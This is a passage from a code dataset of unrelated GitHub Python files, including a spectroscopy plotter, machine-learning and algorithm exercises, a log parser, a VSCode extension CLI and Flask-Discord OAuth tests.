fig.savefig(plot_file, dpi=600, bbox_inches='tight')\n\n\ndef main():\n config = cb.get_config('absconv.conf')\n data_files_list = cb.get_files_list(os.getcwd(), 'csv')\n fig_all = plt.figure()\n bx = fig_all.add_subplot(1, 1, 1)\n for data_file in data_files_list:\n try:\n print('-> Processing file: {}...'.format(data_file))\n data_sheet = pd.read_csv(data_file, names=columns_list)\n data_sheet.drop([0, 1], inplace=True)\n data_sheet.reset_index(drop=True, inplace=True)\n for column_name in columns_list[:2]:\n data_sheet[column_name] = pd.to_numeric(data_sheet[column_name])\n data_sheet['Normalized'] = cb.normalize(data_sheet['Absorbance'])\n data_sheet['Max wavelenght'][0] = data_sheet['Wavelenght'][data_sheet['Absorbance'].idxmax()]\n create_plot(data_sheet['Wavelenght'], data_sheet['Normalized'], data_file)\n bx.plot(data_sheet['Wavelenght'], data_sheet['Absorbance'], '-', label=cb.get_file_name(data_file))\n excel_file = cb.get_new_extension(data_file, 'xlsx')\n data_sheet.to_excel(excel_file)\n except Exception as e:\n print(e)\n else:\n print(' Processing sucessful, {} created.'.format(excel_file))\n bx.set(**plot_props)\n bx.margins(x=0)\n bx.legend(loc='best', frameon=False)\n fig_all.savefig('all_plots.png', dpi=600, bbox_inches='tight')\n\nif __name__ == '__main__':\n main()\n","repo_name":"memfagor/spectconv","sub_path":"absconv.py","file_name":"absconv.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35413256331","text":"#!/usr/bin/env python3\n\"\"\"\n L2 Regularization Cost module\n\"\"\"\nimport numpy as np\n\n\ndef l2_reg_cost(cost, lambtha, weights, L, m):\n \"\"\"\n Returns the L2 cost of a\n neural network\n \"\"\"\n w_new = dict()\n for k, v in weights.items():\n if k[0] == 'W':\n w_new[k] = v\n res = cost + (lambtha / (2 * m)) * np.sum([np.linalg.norm(w)\n for w in w_new.values()])\n return res\n","repo_name":"IHansen225/holbertonschool-machine_learning","sub_path":"supervised_learning/regularization/0-l2_reg_cost.py","file_name":"0-l2_reg_cost.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26387015287","text":"from pdb import set_trace as T\nimport numpy as np\nfrom scipy.misc import imread, imsave\nfrom sim.lib.Enums import Neon\nfrom skimage.color import rgb2lab, deltaE_cie76\n\nfdir = 'resource/Material/'\nfname = 'textures.png'\ntex = imread(fdir+fname)\ncolors = (\n Neon.RED, Neon.ORANGE, Neon.YELLOW,\n Neon.GREEN, Neon.MINT, Neon.CYAN,\n Neon.BLUE, Neon.PURPLE, Neon.MAGENTA,\n Neon.FUCHSIA, Neon.SPRING, Neon.SKY,\n Neon.BLOOD, Neon.BROWN, Neon.GOLD, Neon.SILVER)\ncolors = np.stack([Neon.rgb(c) for c in colors])\nsz = tex.shape[0]\nalpha = tex[:, :, 3]\ntex = tex[:, :, :3]\n\ntex = tex.reshape(-1, 1, 3)\ntex = rgb2lab(tex/255)\n\nclrs = colors.reshape(1, -1, 3)\nclrs = rgb2lab(clrs/255)\n\ndists = deltaE_cie76(tex, clrs)\n#dists = np.sum((tex - clrs)**2, 2)\ninds = np.argmin(dists, 1)\npx = np.array([colors[i] for i in inds])\npx = px.reshape(sz, sz, 3)\nimsave('tex.png', px)\n\n","repo_name":"openai/neural-mmo","sub_path":"jsuarez/tools/ColorTransform.py","file_name":"ColorTransform.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":1496,"dataset":"github-code","pt":"37"} +{"seq_id":"12069299301","text":"### 첫 번쨰 풀이\nimport sys\ninput = sys.stdin.readline\nday = int(input())\ndata = []\ndp = [0] 
* (day + 1)\n\nfor _ in range(day):\n data.append(list(map(int, input().split())))\n\nfor i in range(day - 1, -1, -1):\n t, p = data[i][0], data[i][1]\n\n if i + t <= day:\n dp[i] = max(dp[i + 1], dp[i + t] + p)\n else:\n dp[i] = dp[i + 1]\n\nprint(dp[0])","repo_name":"SooonChang/ps-solutions","sub_path":"dongbin_na/Part3/ch16_dynamic/q33/q33.py","file_name":"q33.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18353303387","text":"import sys\nsys.setrecursionlimit(10 ** 5)\ninput = sys.stdin.readline\n\nk = int(input())\n\nhere = 2\ncnt = 2\nseq = [2]\nseq_cnt = [2]\n\nwhile cnt < k:\n here *= 2\n cnt += here\n seq.append(here)\n seq_cnt.append(cnt)\n\n# print(seq)\n# print(seq_cnt)\n\nres = \"\"\n\nfor i in range(len(seq)-1,0,-1):\n half = seq[i] / 2\n if k - seq_cnt[i-1] <= half:\n res += \"4\"\n k -= half\n else:\n res += \"7\"\n k -= seq[i]\n\nif k % 2 == 0:\n res += \"7\"\nelse:\n res += \"4\"\nprint(res)","repo_name":"tommy16102/2022-algorithm-study","sub_path":"2023/4-4/이정욱/2877_4와7.py","file_name":"2877_4와7.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"34498941536","text":"def queue_time(customers, n):\n\n #Returns the time it takes for all customers to leave a queue given a number\n #of tills n, and a list of customers with the time it takes for each customer\n #to finish at a till. The assumption is that the next customer moves straight\n #to a till as soon as it opens\n #For example [10,2,3,4] with 2 tills will take 10 units of time, since 2,3,4\n #all finish in the second till before 10 finishes.\n \n if customers == [] or n == 0:\n return 0\n elif n >= len(customers):\n return max(customers)\n else: \n tills = customers[:n]\n minimum = 0\n for c in customers[n:]:\n minimum = min(tills)\n min_idx = tills.index(minimum)\n tills[min_idx] = tills[min_idx] + c\n return max(tills)\n","repo_name":"askaross/personal-projects","sub_path":"Calculate_queuing_time.py","file_name":"Calculate_queuing_time.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40778504528","text":"from __future__ import annotations\n\nimport re\n\nfrom bs4 import BeautifulSoup\n\nfrom .util import SPACE, normalize\n\n\nMENTION_TEMPLATE = re.compile('>>[0-9]+')\nOP_TEMPLATE = re.compile(r'\\(OP\\)>?')\nEMPTY = ''\nMIN_POST_LENGTH = 0\n\nMENTION_TEMPLATE = re.compile(r'>>([0-9]+)(\\s+\\(OP\\)\\s*)?')\nPOST_ID_TEMPLATE = re.compile('m[0-9]{4,}')\nPOST_ID_HEAD_TEMPLATE = re.compile('([0-9]+).*', re.DOTALL)\n\n\nclass MissingPostIdException(Exception):\n pass\n\n\ndef post_id_to_int(post_id: str):\n return int(post_id[1:])\n\n\ndef parse_mention(mention: BeautifulSoup):\n match = MENTION_TEMPLATE.fullmatch(mention.text)\n\n if match is None:\n return None\n\n return int(match.group(1))\n\n\ndef parse_post_id(post_id: str):\n if post_id is None or len(post_id) < 1:\n return None\n\n try:\n return int(post_id)\n except ValueError:\n match = POST_ID_HEAD_TEMPLATE.fullmatch(post_id)\n\n # if post_id == '169
\\n\\t\\t\\t\\t\\t\\t\\t\\n\\t\\t\\t\\t\\t\\t\\n\\t\\t\\t\\t\\n\\t\\t\\t\\t\\t\\t\\n\\t\\t\\t\\t\\t\\t\\t
{mention.short_description}' for mention in mentions])\n )\n\n @property\n def length(self):\n return len(self.mentions)\n\n @property\n def size(self):\n return len(self.text)\n\n @classmethod\n def from_body(cls, body: BeautifulSoup, html: BeautifulSoup = None, key = None):\n body_text = None if body is None else body.get_text(separator = SPACE)\n text = normalize(MENTION_TEMPLATE.sub(SPACE, OP_TEMPLATE.sub(SPACE, EMPTY if body_text is None else body_text)))\n if len(text) < MIN_POST_LENGTH:\n return None, None\n\n # if key == 52234659:\n # print(body)\n # print(html)\n\n if key is None:\n try:\n key = None if body is None else post_id_to_int(body['id'])\n except KeyError:\n key = None\n except ValueError:\n id_matches = POST_ID_TEMPLATE.findall(str(body))\n if len(id_matches) < 1:\n raise MissingPostIdException(f'{id_matches}')\n key = post_id_to_int(id_matches[0])\n\n # print(html)\n\n # mentions = None if html is None else html.find_all('a', {'class': 'post-reply-link'})\n # if mentions is not None:\n # mentions = [int(mention['data-num']) for mention in mentions]\n\n if html is None:\n mentions = None\n else:\n mentions = []\n\n for link in html.find_all('a'):\n mention = parse_mention(link)\n if mention is not None:\n mentions.append(mention)\n\n # for mention in html.find('div', id=f'refmap-{key}').find_all('a', {'class': 'post-reply-link'}):\n # print(mention['data-num'])\n\n return mentions, cls(text = text, id = key)\n\n @classmethod\n def from_html(cls, html: BeautifulSoup):\n body = html.find(\"blockquote\")\n\n if body is None:\n body = html.find('article')\n\n if body is None:\n body = html.find('div', {'class': 'post_comment_body'})\n\n key = html.get('postid')\n\n return cls.from_body(body, html, key = parse_post_id(key))\n","repo_name":"zeionara/much","sub_path":"much/Post.py","file_name":"Post.py","file_ext":"py","file_size_in_byte":4037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14481241971","text":"class Stack:\n sizeof = 0\n def __init__(self,list = None):\n if list == None:\n self.item =[]\n else :\n self.item = list\n def push(self,i):\n self.item.append(i)\n def size(self): \n return len(self.item)\n\n def isEmpty(self):\n if self.size()==0:\n return True\n else:\n return False\n def pop(self):\n # tmp = self.item[self.size()-1]\n # del self.item[self.size()-1]\n # return tmp\n return self.item.pop()\n def peek(self):\n tmp = self.item[self.size()-1]\n return tmp\nclass bowl:\n def __init__(self,a,b):\n self.w = int(a)\n self.f = int(b)\nx = list(input(\"Enter Input : \").split(\",\"))\ns = Stack()\nbl = []\nfor i in range(len(x)):\n # print(x[i].split()[0],x[i].split()[1])\n bl.append(bowl(x[i].split()[0],x[i].split()[1]))\ncount = 0\nwhile counts.peek().w and not s.isEmpty():\n print(s.pop().f)\n if s.isEmpty(): \n # print(\"push2\",bl[count])\n s.push(bl[count])\n break\n else:\n # print(\"push2\",bl[count])\n s.push(bl[count])\n count+=1\n\n\n","repo_name":"ppbasleng/CE-Classroom","sub_path":"Datastruc/lab3/lab3-2.py","file_name":"lab3-2.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3532256024","text":"#!/usr/bin/env python\n\n# coding=utf-8\n\n\"\"\"\nRuns an execution node.\n\"\"\"\n\nimport sys\n\nimport ConfigParser\n\nfrom suricate.analytics import exec_node\n\n__author__ = 'tmetsch'\n\nconfig = ConfigParser.RawConfigParser()\nconfig.read('app.conf')\n# MongoDB connection\nmongo = 
config.get('mongo', 'uri')\n# Rabbit part\nbroker = config.get('rabbit', 'uri')\n# SDK\nsdk = config.get('suricate', 'python_sdk')\n\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n raise AttributeError('please provide a tenant id for this execution '\n 'node as first argument!')\n\n user = sys.argv[1]\n exec_node.ExecNode(mongo, broker, sdk, user)\n","repo_name":"tmetsch/suricate","sub_path":"bin/run_exec.py","file_name":"run_exec.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"3643928776","text":"#\n# @lc app=leetcode.cn id=2044 lang=python3\n#\n# [2044] Count Number of Maximum Bitwise-OR Subsets\n#\n\n# @lc code=start\nclass Solution:\n def countMaxOrSubsets(self, nums: List[int]) -> int:\n maxOr, cnt = 0, 0\n for i in range(1, 1 << len(nums)):\n orVal = reduce(\n or_, (num for j, num in enumerate(nums) if (i >> j) & 1), 0)\n if orVal > maxOr:\n maxOr, cnt = orVal, 1\n elif orVal == maxOr:\n cnt += 1\n return cnt\n# @lc code=end\n","repo_name":"boredcui/LeetCode","sub_path":"Medium/2044.统计按位或能得到最大值的子集数目.py","file_name":"2044.统计按位或能得到最大值的子集数目.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14473513606","text":"\"\"\"Main program entry point module that parses original CLI arguments\"\"\"\n\nimport sys\nimport logging\nfrom getpass import getuser\nfrom typing import List\n\nimport configargparse\nfrom fuzzywuzzy import process\nfrom rich.console import Console\n\nfrom pyvem._util import iso_now, resolved_path\nfrom pyvem._editor import SupportedEditorCommands\n\nfrom pyvem.commands.commands import _COMMAND_NAMES\nfrom pyvem.commands.commands import _COMMAND_NAMES_AND_ALIASES\nfrom pyvem.commands.commands import get_command_obj\n\nfrom pyvem._command import Command\nfrom pyvem._config import _PROG, rich_theme\nfrom pyvem._containers import parsed_connection_parts\nfrom pyvem._logging import get_rich_logger\n\n_CONSOLE = Console(theme=rich_theme)\n_LOGGER = get_rich_logger(__name__, console=_CONSOLE)\n_FUZZYISH_COMMAND_THRESHOLD = 50\n_TMP_OUTPUT_DIR = f'/tmp/{getuser()}-{_PROG}-{iso_now()}'\n\n\ndef get_similar_commands(command: str) -> List[str]:\n \"\"\"\n Perform a fuzzy check for similar command names to a given command. 
Only\n values meeting or exceeding the _FUZZYISH_COMMAND_THRESHOLD are returned.\n\n Arguments:\n command\n\n Returns:\n A list of fuzzy matches that meet a pre-determined threshold.\n \"\"\"\n return [x[0] for x in process.extract(query=command,\n choices=_COMMAND_NAMES_AND_ALIASES)\n if x[1] > _FUZZYISH_COMMAND_THRESHOLD]\n\n\ndef create_main_parser() -> configargparse.ArgParser:\n \"\"\"Creates and returns the main parser for vem's CLI.\"\"\"\n #\n # setup the parser\n #\n parser_kwargs = {\n 'usage': f'{_PROG} <{\"|\".join(_COMMAND_NAMES)}> [options]\\n\\n'\n 'For help about a specific command:\\n\\t'\n f'[example]{_PROG} help [/]',\n 'add_help': False,\n 'default_config_files': ['.vemrc', '~/.vemrc', '~/.config/.vemrc',\n '.vemrc.yml', '~/.vemrc.yml',\n '~/.config/.vemrc.yml'],\n 'prog': _PROG,\n 'description': 'VSCode CLI helper for editors and extensions'\n }\n\n parser = configargparse.ArgumentParser(**parser_kwargs)\n\n #\n # setup the parser groups\n #\n required_named = parser.add_argument_group('required named arguments')\n optional_named = parser.add_argument_group('optional named arguments')\n optional = parser.add_argument_group('optional arguments')\n\n #\n # setup positional arguments\n #\n parser.add_argument('command',\n nargs='?',\n choices=_COMMAND_NAMES + [None],\n help=f'The main {_PROG} command to execute.')\n\n parser.add_argument('args',\n nargs='*',\n default=[],\n help='The command arguments.')\n\n #\n # setup required named arguments\n #\n required_named.add_argument('-h', '--ssh-host',\n default='',\n required=True,\n type=parsed_connection_parts,\n help='Specify an SSH host in the form '\n '[user@]server[:port].')\n\n #\n # setup optional named arguments\n #\n optional_named.add_argument('-g', '--ssh-gateway',\n default='',\n required=False,\n type=parsed_connection_parts,\n help='Specify an SSH gateway in the form '\n '[user@]server[:port].')\n\n optional_named.add_argument('-o', '--output-dir',\n default=_TMP_OUTPUT_DIR,\n type=resolved_path,\n help='The directory where the extensions will '\n 'be downloaded.')\n\n #\n # setup optional arguments\n #\n optional.add_argument('--help',\n action='store_true',\n help='Show help and exit.')\n\n optional.add_argument('-V', '--version',\n action='store_true',\n default=False,\n help='Show version and exit.')\n\n optional.add_argument('--no-cleanup',\n action='store_true',\n default=False,\n help='Do not remove temporary downloads on the '\n 'local machine.')\n\n #\n # Add verbosity argument option group\n #\n log_level = optional.add_mutually_exclusive_group()\n optional.set_defaults(log_level=logging.INFO)\n log_level.add_argument('-v', '--verbose',\n action='store_const',\n dest='log_level',\n const=logging.DEBUG,\n help='Show debug output.')\n\n log_level.add_argument('-q', '--quiet',\n action='store_const',\n dest='log_level',\n const=logging.ERROR,\n help='Show only the minimally necessary output.')\n\n #\n # Add the target editor argument option group\n #\n target = optional.add_mutually_exclusive_group()\n optional.set_defaults(target=SupportedEditorCommands.code)\n target.add_argument('--code',\n action='store_const',\n dest='target',\n const=SupportedEditorCommands.code,\n help='(default) Use VSCode as the target editor.')\n\n target.add_argument('--insiders',\n action='store_const',\n dest='target',\n const=SupportedEditorCommands.insiders,\n help='Use VSCode Insiders as the target editor.')\n\n target.add_argument('--exploration',\n action='store_const',\n dest='target',\n 
const=SupportedEditorCommands.code,\n help='Use VSCode Exploration as the target editor.')\n\n target.add_argument('--codium',\n action='store_const',\n dest='target',\n const=SupportedEditorCommands.codium,\n help='Use VSCodium as the target editor.')\n\n return parser\n\n\ndef main():\n \"\"\"Main entry point for the program\"\"\"\n\n # get and parse the program arguments\n parser = create_main_parser()\n args, remainder = parser.parse_known_args()\n\n # For now, add any remainder arguments to the extra args that we store\n # in a list after plucking the command.\n args.args.extend(remainder)\n\n # Add the remote output directory (doesn't need to be set by user)\n args.remote_output_dir = _TMP_OUTPUT_DIR\n\n # If we got no command, make sure the user didn't just ask for the version,\n # which would be the only case where it's valid to provide an option\n # without providing a command. If this has happened, we'll set the command\n # to be 'version' so the command parser is satisfied and can pass that\n # command along to the VersionCommand handler.\n # TODO: There's probably a better way to handle this\n if not args.command:\n if args.version:\n args.command = 'version'\n else:\n _CONSOLE.print(parser.format_help(), highlight=False)\n sys.exit(1)\n\n # Check if the provided command matches one of the registered commands.\n # If so, pass it along to that command object to run. Otherwise, print\n # an error message and exit.\n command = get_command_obj(args.command)\n\n # If we got a valid command, invoke the command behavior\n if isinstance(command, Command):\n command.invoke(parser, args)\n\n # Otherwise, check if the user just requested to show help. If so, print\n # the help info.\n elif args.help:\n _CONSOLE.print(parser.format_help(), highlight=False)\n\n # Otherwise, the user gave an invalid request.\n else:\n _CONSOLE.print(f'[error]\"{args.command}\" is not a valid {_PROG} '\n 'command[/].\\n')\n\n # Check for similar commands. 
If any similar-enough matches were found,\n # suggest them.\n similar_commands = get_similar_commands(args.command)\n if similar_commands:\n _CONSOLE.print('Maybe you meant one of these commands?\\n\\t'\n f'[i]{\", \".join(similar_commands)}\\n[/]')\n\n # Whether or not any similar commands were found, print the usage,\n # along with an extra empty line to create a little spacing.\n _CONSOLE.print(parser.usage + '\\n', highlight=False)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"taylor-jones/pyvem","sub_path":"pyvem/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10503017211","text":"# -------------------------------------------------------------------\n# -------------------------------------------------------------------\n\n# DESCRIPTION\n\"\"\"\n\nThis script contains a collection of functions that are used\nby the LOC API log scripts.\n\nAssumptions:\n\n- All LOC API log scripts are stored in the same folder\n- There is both an 'input' and 'output' folder in the workspace\n- The workspace 'config' subfolder contains all CSV config files\n\n\"\"\"\n# -------------------------------------------------------------------\n# -------------------------------------------------------------------\n\n# IMPORT MODULES\n\nimport csv\nimport os\nimport platform\nimport psycopg2\nimport time\n\n# -------------------------------------------------------------------\n# -------------------------------------------------------------------\n\n# FUNCTIONS\n\n\n# Parse an API key out of a log file line, where\n# the 'apikey=' parameter is used. API keys appended to\n# the end of a log file line are parsed in the API specific script.\ndef apiKeyParameter(logLine):\n\n # The log file line split on & to create a list\n parameterList = logLine.split(\"&\")\n # The substring to identify the apikey parameter\n substringVal = \"apikey=\"\n # The single list item that contains the substring\n apiKey = [i for i in parameterList if substringVal in i]\n apiKeyStr = str(apiKey)\n # The location index in the list item of the substring\n paramIndex = apiKeyStr.index(\"apikey=\") + 7\n apiKeyStrTrim = apiKeyStr[paramIndex:]\n\n if \" \" in apiKeyStrTrim:\n blankSpaceIndex = apiKeyStrTrim.index(\" \")\n apiKeyStrTrim2 = apiKeyStrTrim[0:blankSpaceIndex]\n else:\n apiKeyStrTrim2 = apiKeyStrTrim\n\n # Remove special characters (brackets, commas etc)\n alphaNum = list([val for val in apiKeyStrTrim2 if val.isalpha() or val.isnumeric()])\n apiKeyAlphaNum = \"\".join(alphaNum)\n\n if apiKeyAlphaNum == \"\":\n apiKeyAlphaNum = \"API key parameter had no value\"\n\n return apiKeyAlphaNum\n\n\n# Assemble the string values into a comma delimited string to write to CSV\ndef assembleList(\n ipAddress,\n apiKey,\n isoTime,\n method,\n protocol,\n statusCode,\n resource,\n responseFormat,\n parameters,\n logEntry,\n fileName,\n):\n\n tableEntryString = (\n isoTime\n + \",\"\n + ipAddress\n + \",\"\n + apiKey\n + \",\"\n + method\n + \",\"\n + protocol\n + \",\"\n + statusCode\n + \",\"\n + resource\n + \",\"\n + responseFormat\n + \",\"\n + logEntry\n + \",\"\n + parameters\n + \"\\n\"\n )\n\n writeToFile(tableEntryString, fileName)\n\n\n# Convert the date timestamp in the log file to a new format\ndef convertTimeStamp(timestamp):\n\n calendar = {\n \"Jan\": \"01\",\n \"Feb\": \"02\",\n \"Mar\": \"03\",\n \"Apr\": \"04\",\n \"May\": \"05\",\n \"Jun\": \"06\",\n \"Jul\": \"07\",\n \"Aug\": 
\"08\",\n \"Sep\": \"09\",\n \"Oct\": \"10\",\n \"Nov\": \"11\",\n \"Dec\": \"12\",\n }\n\n day = timestamp[0:2]\n month = timestamp[3:6]\n year = timestamp[7:11]\n time = timestamp[12:20]\n\n monthNum = calendar[month]\n\n isoDate = year + \"-\" + monthNum + \"-\" + day + \"T\" + time + \"-\" + \"08:00\"\n\n return isoDate\n\n\n# Convert specific columns from the config CSV files to dictionaries\ndef csvToDict(configFile, dictName, colNum):\n\n with open(configFile, \"r\") as apiConfig:\n next(apiConfig) # skip the CSV header\n data = csv.reader(apiConfig)\n dictName = {rows[colNum]: 0 for rows in data}\n\n return dictName\n\n\n# Confirm that the provided string is listed in the\n# dictionary of allowed values\ndef valueRangeChecker(strValue, dictValues):\n\n validFormat = False\n\n for key in dictValues:\n if key == strValue and key != \"\":\n validFormat = True\n break\n else:\n validFormat = False\n\n return validFormat\n\n\n# Only parse lines from the logs where an API\n# resource is listed.\ndef lineChecker(logLine, resDict):\n\n validLine = False\n\n for key in resDict:\n if key in logLine and key != \"\":\n validLine = True\n break\n else:\n validLine = False\n\n return validLine\n\n\n# Assemble a comma delimited string containing a boolean value for\n# each parameter used in an API request\ndef parseParameters(\n ipAddress,\n apiKey,\n isoTime,\n method,\n protocol,\n statusCode,\n resource,\n responseFormat,\n parameters,\n logEntry,\n fileName,\n paramDt,\n):\n\n parameterStrList = \"\"\n\n for key in paramDt:\n if key in parameters:\n paramVal = \"Y\"\n parameterStrList += paramVal + \",\"\n else:\n paramVal = \"\"\n parameterStrList += paramVal + \",\"\n\n if parameterStrList.endswith(\",\"):\n parameterStrList = parameterStrList[:-1]\n\n assembleList(\n ipAddress,\n apiKey,\n isoTime,\n method,\n protocol,\n statusCode,\n resource,\n responseFormat,\n parameterStrList,\n logEntry,\n fileName,\n )\n\n\n# Determine if script is running on Windows or Linux\ndef platformCheck():\n\n pltFrm = platform.system()\n\n # Define which slash to use based on platform\n if pltFrm == \"Windows\":\n slash = \"\\\\\"\n elif pltFrm == \"Linux\":\n slash = \"/\"\n\n return slash\n\n\n# Create a list of subfolders containing log files to iterate through.\ndef subfolderCheck(parentFolder):\n\n subList = [f.name for f in os.scandir(parentFolder) if f.is_dir()]\n\n return subList\n\n\n# Write the file header to a result CSV file\ndef writeLogHeaderToCsv(dParameters, logTableFile):\n\n headerString = \"log_datetime,ip_address,api_key,method,\"\n headerString += \"protocol,status_code,resource,format,log_entry,\"\n\n for key in dParameters:\n if key != \"\":\n headerString += str(key) + \",\"\n\n csvHeader = headerString.rstrip(\",\")\n csvHeader += \"\\n\"\n\n logTableFile.write(csvHeader)\n\n\n# Write the final CSV entry to file\ndef writeToFile(outputString, logOutputFile):\n\n logOutputFile.write(outputString)\n","repo_name":"bcgov/ols-metrics","sub_path":"py/logFunctions.py","file_name":"logFunctions.py","file_ext":"py","file_size_in_byte":6137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39529292640","text":"from turtle import Turtle, Screen\r\nimport random\r\n\r\ncolors = [x for x in range(256)]\r\n\r\n\r\ndef get_random_rgb():\r\n r = random.choice(colors)\r\n g = random.choice(colors)\r\n b = random.choice(colors)\r\n return r, g, b\r\n\r\n\r\nif __name__ == '__main__':\r\n t = Turtle()\r\n screen = Screen()\r\n \"\"\"for i 
in range(24):\r\n drawing_turtle.left(15)\r\n drawing_turtle.fd(100)\r\n drawing_turtle.left(45)\r\n drawing_turtle.fd(10)\r\n drawing_turtle.left(90)\r\n drawing_turtle.fd(10)\r\n drawing_turtle.left(45)\r\n drawing_turtle.fd(100)\r\n \"\"\"\r\n \"\"\"for i in range(0, 100, 10):\r\n t.fd(10)\r\n if t.pencolor() == \"black\":\r\n t.pencolor(\"white\")\r\n else:\r\n t.pencolor(\"black\")\"\"\"\r\n \"\"\"total_degrees = 360\r\n\r\n for i in range(3, 11):\r\n turn_angle = total_degrees / i\r\n t.pencolor(random.choice(COLORS))\r\n for turns in range(i):\r\n t.fd(100)\r\n t.left(turn_angle)\r\n\"\"\"\r\n\r\n \"\"\" step_size = 40\r\n angles = [0, 90, 180, 270]\r\n t.pensize(10)\r\n t.speed(10)\r\n screen.colormode(255)\r\n for i in range(1000):\r\n t.setheading(random.choice(angles))\r\n t.pencolor(get_random_rgb())\r\n t.forward(step_size) \"\"\"\r\n\r\n\r\ndef draw_spirograph(gap_size):\r\n screen.colormode(255)\r\n t.speed(\"fastest\")\r\n for i in range(int(360 / gap_size)):\r\n t.left(gap_size)\r\n t.pencolor(get_random_rgb())\r\n t.circle(100)\r\n\r\n\r\ndraw_spirograph(3)\r\n\r\nscreen.exitonclick()\r\n","repo_name":"usvarma/100DaysOfCodePython","sub_path":"Day18/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21817189332","text":"from types import SimpleNamespace\n\nimport flask\nimport pytest\nfrom flask import jsonify\nfrom werkzeug.exceptions import abort\n\nfrom flask_discord import DiscordOAuth2Session\nfrom flask_discord.models import User, UserConnection\nfrom flask_discord.models.base import DiscordModelsBase\n\n\n@pytest.fixture\ndef user_payload():\n return {'id': 1,\n 'username': 'test_username',\n 'discriminator': '1000',\n 'avatar': 'test_avatar',\n 'bot': False,\n 'mfa_enabled': False,\n 'locale': 'test_locale',\n 'verified': False,\n 'email': 'test_email',\n 'flags': 100,\n 'premium_type': 100}\n\n\n@pytest.fixture\ndef user_full(user_payload):\n return User(user_payload)\n\n\n@pytest.fixture\ndef user_connection_payload():\n return {'id': 1,\n 'name': 'test_name',\n 'type': 'test_type',\n 'revoked': False,\n 'verified': False,\n 'friend_sync': False,\n 'show_activity': False,\n 'visibility': 1}\n\n\n@pytest.fixture\ndef user_connection(user_connection_payload):\n return UserConnection(user_connection_payload)\n\n\n@pytest.fixture\ndef app(monkeypatch):\n app = flask.Flask(__name__)\n app.config['TESTING'] = True\n app.secret_key = b\"%\\xe0'\\x01\\xdeH\\x8e\\x85m|\\xb3\\xffCN\\xc9g\"\n monkeypatch.setenv('OAUTHLIB_INSECURE_TRANSPORT', 'true')\n\n app.config[\"DISCORD_CLIENT_ID\"] = 490732332240863233\n app.config[\"DISCORD_CLIENT_SECRET\"] = \"TEST_DISCORD_CLIENT_SECRET\"\n app.config[\"DISCORD_BOT_TOKEN\"] = \"TEST_DISCORD_BOT_TOKEN\"\n app.config[\"DISCORD_REDIRECT_URI\"] = \"http://127.0.0.1:5000/callback\"\n\n discord = DiscordOAuth2Session(app)\n\n @app.route(\"/me/\")\n def me():\n user = discord.fetch_user()\n if user is None:\n abort(401)\n\n return jsonify(\n user_name=user.name,\n avatar_url=user.avatar_url or user.default_avatar_url,\n is_avatar_animated=user.is_avatar_animated\n )\n\n @app.route(\"/me/connections/\")\n def my_connections():\n user = discord.fetch_user()\n connections = discord.fetch_connections()\n if user is None or connections is None:\n abort(401)\n\n return jsonify(\n user_name=user.name,\n connections=[f\"{connection.name} - {connection.type}\" for connection in connections]\n )\n\n 
@app.route(\"/me/guilds/\")\n def user_guilds():\n guilds = discord.fetch_guilds()\n guilds = guilds.return_value\n\n return \"
\".join([f\"[ADMIN] {g.name}\" if g.permissions.administrator else g.name for g in guilds])\n\n @app.route(\"/add_to//\")\n def add_to_guild(guild_id):\n user = discord.fetch_user()\n return user.add_to_guild(guild_id)\n\n return app\n\n\ndef test_get_user_info_unauthorized(app, user_full, mocker):\n with app.app_context():\n app.discord = SimpleNamespace()\n app.discord.authorized = False\n\n mocker.patch('flask.current_app', return_value=app)\n\n mocker.patch.object(User, 'get_from_cache', return_value=None)\n mocker.patch.object(User, 'fetch_from_api', return_value=None)\n\n with app.test_client() as client:\n response = client.get('/me/')\n assert response.status_code == 401\n\n\ndef test_get_user_info_authorized(app, user_full, mocker):\n with app.app_context():\n app.discord = SimpleNamespace()\n app.discord.authorized = True\n\n mocker.patch('flask.current_app', return_value=app)\n\n mocker.patch.object(User, 'get_from_cache', return_value=user_full)\n mocker.patch.object(User, 'fetch_from_api', return_value=user_full)\n\n with app.test_client() as client:\n response = client.get('/me/')\n assert response.status_code == 200\n assert response.json['user_name'] == user_full.name\n assert response.json['avatar_url'] == user_full.avatar_url\n assert response.json['is_avatar_animated'] == user_full.is_avatar_animated\n\n\ndef test_get_user_connections_unauthorized(app, user_full, mocker):\n with app.app_context():\n app.discord = SimpleNamespace()\n app.discord.authorized = False\n\n mocker.patch('flask.current_app', return_value=app)\n\n mocker.patch.object(User, 'get_from_cache', return_value=None)\n mocker.patch.object(User, 'fetch_from_api', return_value=None)\n mocker.patch.object(UserConnection, 'fetch_from_api', return_value=None)\n\n with app.test_client() as client:\n response = client.get('/me/connections/')\n assert response.status_code == 401\n\n\ndef test_get_user_connections_authorized(app, user_full, user_connection, mocker):\n with 